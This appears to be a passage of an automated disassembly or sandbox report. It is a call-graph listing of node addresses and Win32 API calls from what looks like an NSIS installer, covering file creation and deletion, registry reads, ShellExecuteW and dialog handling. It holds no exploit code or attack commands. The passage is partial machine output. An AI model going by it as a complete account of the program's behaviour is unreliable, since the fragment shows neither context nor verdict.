                                                                                        memory and strings: GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, lstrlenW, lstrcpyW, lstrcpynA, lstrcpynW, lstrcatW, lstrcmpA, lstrcmpW, lstrcmpiW, CharUpperW, CharNextW, CharPrevW, wsprintfW, WideCharToMultiByte, MulDiv;
                                                                                        clipboard: OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard;
                                                                                        window and UI: SendMessageW, SendMessageTimeoutW, CallWindowProcW, DefWindowProcW, FindWindowExW, IsWindow, IsWindowVisible, IsWindowEnabled, ShowWindow, EnableWindow, DestroyWindow, SetWindowPos, SetWindowLongW, GetWindowLongW, SetWindowTextW, GetWindowRect, GetClientRect, ScreenToClient, GetMessagePos, GetSystemMetrics, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, CreateDialogParamW, MessageBoxIndirectW, SetTimer, CreatePopupMenu, AppendMenuW, TrackPopupMenu, GetSystemMenu, EnableMenuItem, InvalidateRect, ImageList_Destroy;
                                                                                        GDI: GetDC, GetDeviceCaps, BeginPaint, EndPaint, FillRect, CreateBrushIndirect, CreateFontIndirectW, DeleteObject, GetSysColor, SetTextColor, SetBkColor, SetBkMode.]
3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 
3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 
406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 
3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 
3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 
3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 
3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 
CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 
40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 
405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 
5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 
5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 
5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 